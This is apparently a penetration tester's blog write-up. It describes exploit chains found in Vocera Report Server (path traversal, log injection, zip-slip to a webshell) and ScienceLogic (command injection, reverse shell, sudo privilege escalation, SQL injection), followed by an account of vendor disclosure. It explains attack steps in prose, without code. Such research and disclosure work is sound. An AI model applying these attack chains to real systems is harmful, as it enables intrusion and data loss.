Reading view
Vocera Report Server Pwnage
This article is in no way affiliated, sponsored, or endorsed with/by Vocera Communications or Stryker Corporation. All graphics are being displayed under fair use for the purposes of this article.
Quest for RCE
Last year during a routine penetration test, our team came across a interesting target called Vocera Report Server while reviewing web endpoint screenshots.
A little research revealed that the “Vocera Report Server software and the associated report console interface provide administrators, managers, and decision makers the ability to monitor system performance and generate reports for analysis” for the Vocera Communication System. When we click on the “Vocera Report Console” link we are greeted with the following login page.
Step 1: head over to Google to see if we can find any documentation that might list default credentials for the application. As luck would have it, this page comes up and kindly tells us what the default password would be.
Fortunately the system owner didn’t change the password and we log right in. Once inside we start perusing the various endpoints to get a feel for what the application is used for. Right off, the first thing that stands out is the menu that is named “Task Scheduler”. Clicking on the menu brings up a panel that appears to let you create tasks that will be executed.
After tinkering with the various tasks, it appears we can only edit existing tasks. We also can’t seem to get arbitrary command execution or injection by modifying the existing entries. At this point we decided it would likely be more fruitful to move on to a white box approach and see what the code is actually doing. We reached out to a colleague to get us access to the server using some credentials they had cracked after pulling the hash with Responder.
Since the application is written in Java, we open up the class files in JD-GUI to begin analyzing the function responsible for executing tasks. The first issue we notice is that the function that parses the user-controlled task execFileName attempts to retrieve the filename portion of the path by searching for the last occurrence of a backslash. Unfortunately in Java, forward slashes are automatically normalized into directory separators in a file path. This means we can traverse out of the intended directory.
While the path to the executable task is controllable, a check is performed that ensures that the file contains the word “java” before executing. This means if we can control the contents of a file on disk, we can execute arbitrary commands.
How then do we get a file on disk that we control? What if we can affect the log file? It looks like if an exception happens when executing the task, a log entry is created.
Sure enough, if we specify a task execfilename that doesn’t exist, an entry is created in the log file that also includes the task parameters that we can inject arbitrary data. With a little creativity, we are able to inject arbitrary commands and then point to the log file using the directory traversal to achieve remote code execution.
Can we do better?
With a path to execute arbitrary commands identified, we shifted our focus to finding a way to accomplish the same thing but without having to authenticate first. While investigating the task execution code in the previous exercise, we noticed there is a websocket interface that the web server communicates with when executing a task. After some testing it was determined that this interface was unauthenticated. In addition to the “runTaskPage” function mentioned above, there are a few other operations that appear to be related to database management functions that are worth investigating.
If we look at the code for the restoreSqlData operation we see that it executes a bat file that in turn executes another Java JAR. Inside that JAR, the function that handles the restoreSqlData operation parses the “uploadFile” parameter and appends it to the local “backupDir”. This instance is also vulnerable to directory traversal like the one mentioned previously.
The specified file is expected to be a zip file that is then programmatically unzipped and written to disk. The problem, as you could probably guess, is the unzip function is vulnerable to directory traversal which could lead to an arbitrary file write. If the unzip succeeds, a particular file is read from the archive that is then used to completely overwrite the database. DANGER: THIS OPERATION OVERWRITES THE DATABASE SO ADDITIONAL MEASURES NEED TO BE TAKEN TO PREVENT THIS.
Since this server hosts a web server and is running as SYSTEM, an arbitrary file write can be used to achieve remote code execution by writing a webshell in the webroot. To summarize, in this instance we have found an unauthenticated endpoint that allows for a privileged file write if we can place an arbitrary file somewhere on the file system. We lack one more primitive to pull off this exploit. Back to the code!
Given the specific requirement for a file write, we search for any references to “write” and work our way back to any web endpoints that would reach that code. This concept is often referred to as source to sink data flow analysis. After some time we find a class called MultipartRequest. This class is instantiated from an incoming multipart/form-data request. If the requests contains any parameters that are named filename, the data is read and written to a file in a temp folder.
If we search for references of RequestContainer, the class responsible for creating MultipartRequest instances, we see it is created by the BaseController class on the handling of each HTTP request. Since BaseController is an abstract class, we search for any child classes and find ReportController. This is perfect since ReportController is the primary endpoint for the application. This means if we send an HTTP request with Content-Type multipart/form-data to the ReportController endpoint, the contents of any parameters with a Content-Disposition that contains a filename will be written to disk in a temp directory. This best part is this is all unauthenticated (another bug)!
Now we have all the pieces necessary to construct an exploit chain to gain unauthenticated remote code execution on the Vocera Report Server. First we construct a malicious zip file with a webshell embedded with a directory traversal path. Next we upload a zip file to the temp directory with a multipart request. Finally we send a websocket request with the restoreSqlData operation with a directory traversal path to our uploaded zip file.
WAIT!!! HOW DO I NOT CLOBBER THE DATABASE?!?!
As much as any customer likes red teamers proving exploitation, nuking an application’s database is probably not a reasonable loss to prove code execution. That means we needed to put in a little more effort into the exploit to avoid this. If we look at the SQL restore function, we can see that if a ZipException is thrown (that is not a version issue), the function will bail out.
How then do we cause a ZipException while also successfully executing our arbitrary file write? If we look at the JDK source code for ZipInputStream we can see a simple way to cause a ZipException to be thrown from a specific ZipEntry. If we set the first bit of the flag field in the ZipEntry a ZipException will be thrown since encryption is not supported.
If we lookup the offset for LOCFLG we see it is at index 6 in the ZipEntry header. We can code up some python to modify the zip entry contents after we zip up our payload as shown below.
Vendor Disclosure & Patch
I reported these issues through the Stryker vulnerability disclosure program and can say everything went smoothly and they worked with us to get the issues fixed and patched in a reasonable time frame. Given the severity of these findings, we strongly encourage anyone that has Vocera Report Server deployed to update to the latest version immediately. For tracking purposes, the vulnerabilities discussed here represent CVE-2022-46898, CVE-2022-46899, CVE-2022-46900, CVE-2022-46901, and CVE-2022-46902.
ScienceLogic Dumpster Fire
This article is in no way affiliated, sponsored, or endorsed with/by ScienceLogic, Inc. All graphics are being displayed under fair use for the purposes of this article.
Just another Day
During a penetration test for a client last year, our team identified a noteworthy target that piqued our interest. A screenshot of the website appeared in our scan findings.
After a brief investigation, we found a page that provided a clear overview of the web application’s potential function and its default credentials.
The default credentials for the phpmyadmin server on port 8008 were also provided. This detail becomes crucial later, as it grants the ability to directly modify records within the application database.
Regrettably, the system owner had not updated the default passwords, allowing us to access the system. Immediately noticeable was a menu named “Device Toolbox.” We started examining the parameters provided to these tools, as they frequently have command injection vulnerabilities due to inadequate input filtering.
After trying different payloads in the request fields, the following screen appeared as we navigated through the tool wizard.
Having demonstrated command execution, we swapped the payload for a reverse shell callback and launched it. This granted us shell access to the server. Considering the simplicity of uncovering this initial command injection vulnerability, we believed there might be more similar flaws. Now, with system access, we can observe process creation events using one of our preferred tools, Pspy. As expected, four additional command injection vulnerabilities were identified by exercising various endpoints in the web application and monitoring process creation events in Pspy. An example is illustrated below.
Having access to the file system, we proceeded to examine the web application’s source code. This would make identifying vulnerabilities simpler than through blackbox testing. However, when we tried to view the PHP files, they seemed to be indecipherable.
What about root?
Given our inability to access the web application’s source code, we shifted our focus towards pinpointing potential paths for privilege escalation to root. We uploaded and ran LinPeas on the system to identify any potential privilege escalation vulnerabilities. While LinPeas didn’t reveal anything of particular use, a copy of the sudoers file was located in one of the backup folders on the file system. It had several applications that could be executed as root, without a password, that have known privilege execution capabilities.
The find command is one of my gotos after running across this article years ago. Running the following command will execute the listed command as root on the system.
Having gained root privileges, we could now revisit the web application and hopefully find a way to review the source code for vulnerabilities.
Let’s briefly diverge to discuss the DMCA and the laws surrounding the circumvention of copyright protections. I bring this up because even basic encoding or encryption of source code might be viewed as a method to safeguard copyright. This could potentially hinder security researchers from examining the source code for vulnerabilities. Fortunately, Title 37 recently updated laws surrounding this topic effectively granting security researcher exception to this rule if done under the auspices of good-faith security research. Given that we are red teamers performing good-faith security research, securing our customers against critical vulnerabilities, we clearly fall under this exception.
We took a look at the PHP configuration and noticed a custom module was being used to load each source file. Analyzing the module in IDA Pro, it appears to be a simple function that decrypts the file with a static AES 256 key and then decompresses the output with zlib. Nothing fancy here.
Running this algorithm against the garbled source does the trick and we end up with normal looking PHP.
Beware what’s inside!!!
With access to the source code, we started scrutinizing it for more serious vulnerabilities. We had previously observed a command injection bug where the command was saved in the database and subsequently fetched and executed. This prompted us to search for potential SQL injection vulnerabilities, which might be escalated to remote code execution. As we examined the application endpoints, we discovered what seemed like systematic SQL injection issues. After pinpointing roughly 20 SQL injection vulnerabilities, we chose to conclude our search. A few examples are provided below.
Having identified a combined 25 command injection and SQL injection vulnerabilities we decided to stop bug hunting and reach out to the vendor to begin the disclosure process.
Vendor Disclosure & Patch
We’d love to say responsibly disclosing the vulnerabilities we discovered went smoothly, but it was easily the worst we’ve experienced. What will follow will be presented as a comical list of when responsible disclosure is probably going to go bad. In reality, all of these things happened during this one disclosure.
The vendor has no public vulnerability disclosure policy
The vendor has no security related email contacts listed on their website
The vendor Twitter account refuses to give you a security contact after you explain you want to disclose a security vulnerability.
After spamming vendor emails harvested from OSINT, the only response you get is from a random engineer. Fortunately, he forwards the email to the security director.
The security director refuses to accept your report, and instead points you to a portal to submit a ticket.
After signing up for the ticketing portal, you find that you can’t submit a ticket unless you are a customer.
When you notify the company that you can’t submit a ticket unless you are a customer, they tell you to have your customer submit the report.
When you send the report anyways, encrypted, hosted on trusted website, they refuse to open it because they claim it could be a phish.
Individuals from the vendor, reach out to arbitrary contacts in your customer’s organization to report you for unusual, possibly malicious behavior.
Upon verification of your identity by multiple individuals in your customer’s organization, they agree to open the results but go silent for weeks.
You receive an email from @zerodaylaw (no seriously) saying they will be representing the vendor going forward in the disclosure process.
The law firm has no technical questions about the vulnerabilities themselves, but instead about behavior surrounding post-exploitation and why this software was “targeted“.
After multiple, unresponsive, follow-up emails with both the law firm & the vendor about coordinating with @MITREcorp to get CVEs reserved, you get an email asking to meet in person, that very week.
In the follow-up phone call (after declining to meet in person), the vendor claims most of the bugs were “features” or in “dead code“.
The primary focus on the call with the vendor is how we “got” the company’s code and not about vulnerabilities details.
The vendor claims that meeting the 90-day public disclosure is unlikely and given their customer base they have no estimate on when public disclosure could happen.
After the phone call, the vendor sends an email asking questions focused on exact times, people, authorizations, and details surrounding the vulnerability coordination with @MITREcorp
Lawyers from the vendor contact your customer’s organization requesting copies of all correspondence with @MITREcorp.